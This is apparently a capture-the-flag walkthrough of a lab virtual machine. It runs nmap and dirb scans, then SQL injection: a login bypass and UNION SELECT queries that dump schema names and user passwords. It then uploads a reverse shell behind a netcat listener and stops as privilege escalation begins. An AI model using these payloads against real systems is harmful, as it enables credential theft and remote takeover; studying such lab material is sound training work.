Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 19:15 EDT
Nmap scan report for 192.168.1.109
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
| 256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_ 256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:BA:01:E1 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.83 seconds
Dirb
dirb http://192.168.1.109/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 23 19:18:32 2020
URL_BASE: http://192.168.1.109/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.109/ ----
+ http://192.168.1.109/index.php (CODE:200|SIZE:100)
+ http://192.168.1.109/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.1.109/uploads/
---- Entering directory: http://192.168.1.109/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat May 23 19:18:38 2020
DOWNLOADED: 4612 - FOUND: 2
Let's put the IP to the web browser
Got a login form
Then I click sign up now
After making an account and log in
Exploitation
SQL injection
I tried few tries of SQL injection and successfully got 1 injection using this command
admin' or '1'='1'#
Then I open up Burp and intercept the welcome.php page and send it to repeater.
Then I tried using UNION SELECT and test how many tables are available
Anonymous' UNION SELECT 1,2,3#
The query make a response to us and it has 3 databases
Then I use this query to extract all the database name
Anonymous' UNION SELECT GROUP_CONCAT(SCHEMA_NAME),2,3 FROM information_schema.schemata#
We got few here to see what inside.
After extracting every databases, I found out that database that have interesting tables is webapphacking by usinig this query
Anonymous' UNION SELECT GROUP_CONCAT(TABLE_NAME),2,3 FROM information_schema.tables WHERE table_schema = "webapphacking"#
2 table has been found which is books and users
After that, I extract both tables together using this query
Anonymous' UNION SELECT GROUP_CONCAT(TABLE_NAME, ':', COLUMN_NAME),2,3 FROM information_schema.columns WHERE table_schema = "webapphacking"#
Got a lot of things, let's copy it and put it inside a file
Then we can use sed to replace the comma to newline which the command looks like this
cat tables | sed 's/,/\n/g'
Then we can extract each of the columns name, found out the most interesting one is user and password
Anonymous' UNION SELECT GROUP_CONCAT(user, ':',pasword),2,3 FROM webapphacking.users#
Then we got a very long result from the query, copy it to a file and use sed command to separate it properly
John
Then we can log in with the superadmin account
Got a website that leads us to upload a file
Reverse Shell
Then, we need to change the IP and the port inside the file
After that, upload to the server
Then, we go to the /upload directory that we discovered using dirb just now
First, we need to set up a listener at our machine
Our machine
nc -nlvp 4444
As we can see here we got a file, click the reverseShell file
Privilege Escalation
Go to the /home/legacy directory and we can see a file called touchmenot
